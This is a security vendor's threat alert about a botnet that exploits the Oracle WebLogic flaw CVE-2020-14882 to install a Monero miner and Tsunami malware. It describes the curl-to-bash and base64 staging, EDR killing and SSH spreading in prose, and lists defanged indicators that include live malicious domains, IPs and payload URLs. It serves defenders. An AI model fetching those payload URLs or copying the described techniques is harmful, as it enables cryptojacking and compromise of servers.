• Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Transform
      • SOC Consultancy
      •     SOC Maturity Assessment
      •     SOC Model Evaluation
      •     SOC Gap Analysis
      •     SIEM Gap Analysis
      •     SIEM Optimization
      •     SOC Content Pack
    • Train
      • Security Awareness and Training
      • Tabletop Exercise
      • Simulated Cyber Attack Exercises
    • Respond
      • Incident Response
      • Incident Analysis
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Press Release
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
Rewterz Threat Alert – Malicious NPM Packages Install njRAT
December 2, 2020
Rewterz Threat Advisory – Mozilla Thunderbird SMTP server response codes buffer overflow
December 3, 2020

Rewterz Threat Alert – Multi-Vector Miner and Tsunami Botnet with SSH Lateral Movement

December 2, 2020

Severity

Medium

Analysis Summary

A botnet is detected that propagates using weblogic exploit. The botnet carries two payloads: 1) a Monero XMR Miner binaries; and 2) Tsunami binaries. This botnet is primarily targeting cloud servers. In September, an earlier version of the botnet was exploiting misconfigured docker API. Interestingly, the current botnet version contains unused code for exploiting Redis and for bruteforcing SSH. The botnet achieves persistence in multiple ways; kills running processes, potentially competing mining tools and eliminates EDR. It uses base64 encoded intermediate stage shell-scripts and base64 encoded commands to download and execute python scripts. Tsunami is added as a second payload, in addition to Monero XMR miner. 
It makes use of the Oracle WebLogic RCE exploit CVE-2020-14882. The campaign uses multiple shell-scripts and python-scripts with different dropping locations and connects to binary hosting webservers using hardcoded IP addresses and domains.

The stage 1 executes two payloads, a shell script, xms, and a python script. The shellscript xms is piped to bash from curl, in case that fails, it is fetched with wget, executed and removed, to prevent analysis. The python script is fetched and executed using base64 encoded commands to avoid detection and analysis. The xms shell script attempts to infect hosts that the server has been previously connected to. It also lists running processes to grab information about active SSH connections. The XMR Miner is also targeting Windows servers which is evident by the presence of .exe binaries in the same ftp server. 

Impact

  • Unauthorized Remote Code Execution
  • Unauthorized Access 
  • Process Termination
  • Detection Evasion
  • Unauthorized Resource Consumption 

Indicators of Compromise

Domain Name

  • icanhazip[.]com
  • bash[.]givemexyz[.]in
  • pool[.]supportxmr[.]com
  • xmr[.]givemexyz[.]in

MD5

  • 01581ccc96ce7ccc15205bb859d9e6bd
  • cd7ca50a01fc9c6e8fdc8c3d5e6100f0
  • 8bfc072d37f41190515f8dc00a59fb2e
  • 5954b9c0ee8490f6f1215bace6f6c6e4
  • ee48aa6068988649e41febfa0e3b2169
  • c4d44eed4916675dd408ff0b3562fb1f
  • 5f15d232552301b9e53d597666f610ad
  • 528cfc90fd59af990c2ebc18c0df9b47
  • 790c54d34b09f078a24cf27d6c91740e
  • 9a9a2ffdfa4d2586eef0d1d987b57e9e
  • 8bcf9e1f24093bbf32fbbc3630a0153c
  • eefc0ce93d254982fbbcd26460f3d10d
  • b1fc3486f3f4d3f23fcbf8b8b0522bf8
  • f0551696774f66ad3485445d9e3f7214

SHA-256

  • 72acbfdeadfa31d7ccda7fdcc93944b1948e263239af8850e5b44c518da0a4c5
  • fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3
  • 35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d417f17cfb
  • 6f7393474c6f3c452513231d1e3fa07ed9dcc8d53a1bb2d680c78e9aa03f8f9d
  • 9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872
  • 855557e415b485cedb9dc2c6f96d524143108aff2f84497528a8fcddf2dc86a2
  • 22e3611cb2b156c3dc2d192b65707aac7787955d7dc120dfbc09aef8e12251b5
  • b07bf6e14050c1c56c9b80155417370b4704eb0655cfc18bb4259956162c3814
  • 508ec039ca9885f1afc6f15bb70adfa9ed32f9c2d0bff511052edb39898951c7
  • 8dbd281c98c8e176621566e3a77eb8a3b7ae4f254773d56f7033f903dd09a043
  • 030f41373567846ee18716605dea3ef94d1861b9c32b664d25026d41c3557c00
  • 9aa8a11a52b21035ef7badb3f709fa9aa7e757788ad6100b4086f1c6a18c8ab2
  • 1d804c5dfa6da0db4a4465232ad9117003df2ea8f0fc68d9e48700d4373a4568
  • 1225cc15a71886e5b11fca3dc3b4c4bcde39f4c7c9fbce6bad5e4d3ceee21b3a

SHA1

  • 2940e96f15345149143c53143a87fd9dce45d0ac
  • e632f6b93f9e3d3f90ac2068af0b9f1ccee3cd89
  • 2d9600a0697de84522b4e65d9be02b9ed9352b4d
  • 2132c65f23f8e5a3c533bfa4ab73562c476795e0
  • 73c2099c703c9e644172ff58fd49622c06bf2784
  • 57279a4f3ccd3f6abbc2c306682438234241598b
  • 2847609cb04158c6f8e57ec65d63fabc68577a07
  • 9173ca39c025c322864b05a1cd44c022925d7ffc
  • 87fe997bb49499d1f743da9840618e30aeb5d24e
  • 01ebd97e50edc39ade8cefacaffe5bef5c49bf15
  • adaaf46b2bd14a05e58a460e0e2115e696c182fa
  • bae9b44362654ef283cbd197bca4d2b3aca8868d
  • 7bfa2404bc9733205d2374b92fb3ebf57410228f
  • d5f53aa9b9e9899fa511b199230159dfbf215dad

Source IP

  • 205[.]185[.]116[.]78
  • 66[.]70[.]218[.]40
  • 209[.]141[.]35[.]17
  • 104[.]244[.]75[.]25
  • 198[.]98[.]57[.]217
  • 194[.]156[.]99[.]30

URL

  • http[:]//205[.]185[.]116[.]78/b[.]py
  • http[:]//bash[.]givemexyz[.]in/dd[.]py

Remediation

  • Block the threat indicators at their respective controls.
  • Keep all systems and software updated to latest patched versions.
  • Maintain a strong password policy and enable multifactor authentication where possible. 
  • Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Respond
      • Incident Response
      • Incident Analysis
  • Transform
    • SOC Consultancy
    •     SOC Maturity Assessment
    •     SOC Model Evaluation
    •     SOC Gap Analysis
    •     SIEM Gap Analysis
    •     SIEM Optimization
    •     SOC Content Pack
  • Train
    • Security Awareness and Training
    • Tabletop Exercise
    • Simulated Cyber Attack Exercises
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.